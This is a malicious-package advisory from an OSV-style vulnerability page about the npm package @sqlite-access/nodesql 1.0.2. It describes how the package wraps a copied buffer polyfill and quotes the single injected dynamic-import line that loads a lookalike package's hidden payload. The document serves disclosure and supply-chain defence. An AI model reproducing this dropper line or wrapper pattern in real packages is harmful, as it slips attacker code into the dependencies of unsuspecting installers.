@sqlite-access/nodesql @1.0.2
Vulnerability report · Last retrieved from osv.dev July 10, 2026 at 1:30 AM UTC
OSV ID
MAL-2026-6914
Ecosystem
npm
Summary
The package presents a three-way identity mismatch: the scoped name @sqlite-access/nodesql implies a SQL-access library, the README markets a 'bare-stream' streaming utility, and the shipped index.js is a verbatim copy of the feross/buffer polyfill. Injected at the top of that otherwise-unmodified source is a single line, var ins = import('@sqlite-access/createsql'); , which performs a fire-and-forget dynamic import of an unrelated lookalike scoped package. On require()/import of @sqlite-access/nodesql, that co-package's module top-level executes in the installer's process. The visible code is a decoy — the payload lives in the transitively loaded @sqlite-access/createsql module, and the wrapper's only functional effect is to pull that code into the consumer's runtime. The identity mismatch (name vs. README vs. code), the empty description, generic author metadata, and the injected dynamic import together constitute a wrapper/dropper pattern designed to smuggle attacker-controlled code into installer graphs via a plausible-looking utility dependency.
Source: amazon-inspector (5454044dfacdd12da8025ba7a7c73260f16c64b29dbd25ebda52af4d03e8450c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.